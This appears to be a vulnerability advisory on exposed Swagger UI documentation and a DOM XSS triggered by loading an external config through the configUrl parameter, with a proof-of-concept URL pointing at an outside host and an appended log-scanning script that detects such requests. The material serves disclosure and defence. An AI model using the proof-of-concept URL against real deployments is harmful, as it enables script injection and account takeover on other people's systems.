Description
Summary
Due to improper access control settings on the Swagger-related interfaces, attackers can access the internal API documentation, and one of the interfaces contains an XSS vulnerability.
Details
Swagger UI has an interesting feature that allows you to provide a URL to an API specification, a YAML or JSON file that will be fetched and displayed to the user. To do that you add the query parameter ?url=https://your_api_spec/spec.yaml or ?configUrl=https://your_api_spec/file.json.
The first obvious thing is that if we can bypass the HTML sanitizer, we get a really easy DOM XSS thanks to dangerouslySetInnerHTML: React will simply render ANY HTML and allow us to execute the JS payload.
REFERENCE:
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
POC
IDOR:
http://127.0.0.1:7001/swagger-ui/
XSS:
http://127.0.0.1:7002/swagger-ui/index.html?configUrl=https://jumpy-floor.surge.sh/test.json
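As an added detection example (not part of this advisory or the affected project), the following script scans web-server access logs for requests to the Swagger UI path whose url or configUrl parameter points at a host outside an allowlist, which is exactly the shape of the PoC above. The log format, the allowlist and the sample lines are assumptions constructed for illustration.

```python
"""Flag Swagger UI requests that load an API spec or config from an external host."""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Hosts that may legitimately serve a spec/config to Swagger UI (assumed allowlist).
ALLOWED_SPEC_HOSTS = {"127.0.0.1", "localhost"}
# Query parameters Swagger UI uses to fetch a spec (?url=) or a config (?configUrl=).
SPEC_PARAMS = ("url", "configUrl")
# Common-log-style line: client, timestamp, "METHOD target PROTO", status (assumed format).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target: str) -> Optional[dict]:
    """Return a finding if a Swagger UI request points url/configUrl at a non-allowlisted host."""
    parts = urlsplit(target)
    if "/swagger-ui" not in parts.path:
        return None
    query = parse_qs(parts.query)  # percent-decodes values for us
    for name in SPEC_PARAMS:
        for value in query.get(name, []):
            spec_host = urlsplit(value).hostname
            if spec_host and spec_host not in ALLOWED_SPEC_HOSTS:
                return {"param": name, "spec_host": spec_host, "path": parts.path}
    return None


def scan_log(lines) -> list:
    """Return (client, status, finding) for every suspicious line in the log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m["target"])
        if finding:
            findings.append((m["client"], int(m["status"]), finding))
    return findings


# Constructed sample log lines (not real traffic): one external configUrl, one local url, one non-Swagger path.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /swagger-ui/index.html?configUrl=https://spec-host.example/test.json HTTP/1.1" 200 1234',
    '10.0.0.6 - - [10/Oct/2023:13:56:01 +0000] "GET /swagger-ui/index.html?url=http://127.0.0.1:7001/v3/api-docs HTTP/1.1" 200 1234',
    '10.0.0.7 - - [10/Oct/2023:13:56:20 +0000] "GET /api/users?url=https://spec-host.example/x HTTP/1.1" 200 55',
]

if __name__ == "__main__":
    for client, status, finding in scan_log(SAMPLE_LOG):
        print(f"{client} status={status} {finding['param']} -> {finding['spec_host']} on {finding['path']}")
```

A 200 response on such a request also shows the Swagger UI path itself was reachable, which is the access-control part of the advisory.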

Impact
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/